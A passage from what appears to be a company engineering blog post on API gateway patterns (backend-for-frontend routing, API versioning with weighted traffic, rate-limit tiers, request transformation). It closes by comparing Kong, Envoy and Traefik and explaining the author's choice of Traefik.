Web App     → /web/*     → Web BFF    → [User, Order, Catalog]
Admin Panel → /admin/*   → Admin BFF  → [User, Analytics, Config]

Pattern 2: API Versioning

/api/v1/users → user-service-v1 (weight: 100%)
/api/v2/users → user-service-v2 (weight: 100%)
/api/v3/users → user-service-v2 (weight: 90%) + user-service-v3 (weight: 10%)

Pattern 3: Rate Limiting Tiers

Free tier:     100 requests/minute
Pro tier:      1,000 requests/minute
Enterprise:    10,000 requests/minute
Internal:      No limit

Pattern 4: Request Transformation

Transform requests before they hit your services:

Client sends:  GET /api/users/123
Gateway adds:  X-Request-ID, X-Correlation-ID headers
Gateway strips: Cookie, Authorization (after auth check)
Backend gets:  Clean request with validated context

API GatewayAuthServiceUserServiceOrderServicePaymentServiceMessage Bus / Events

Microservices architecture: independent services communicate through an API gateway and event bus.

Our Recommendation

Choose Kong when: You need a full API management platform with a plugin ecosystem, have a dedicated API team, need advanced auth (OAuth2 flows, LDAP), or want a commercial support option.

Choose Envoy when: You need maximum performance and programmability, are building a service mesh, need WASM extensibility, or are running at very high scale (100K+ RPS).

Choose Traefik when: You run Docker or Kubernetes, want zero-config service discovery, prefer simplicity over features, or are a small-to-medium team without dedicated API infrastructure engineers.

At TechSaaS, we use Traefik for everything. It handles our 50+ services with Docker label discovery, and the 30MB memory footprint means it barely registers on our resource monitoring. For most teams, Traefik's simplicity and Docker integration beats the feature richness of Kong or Envoy.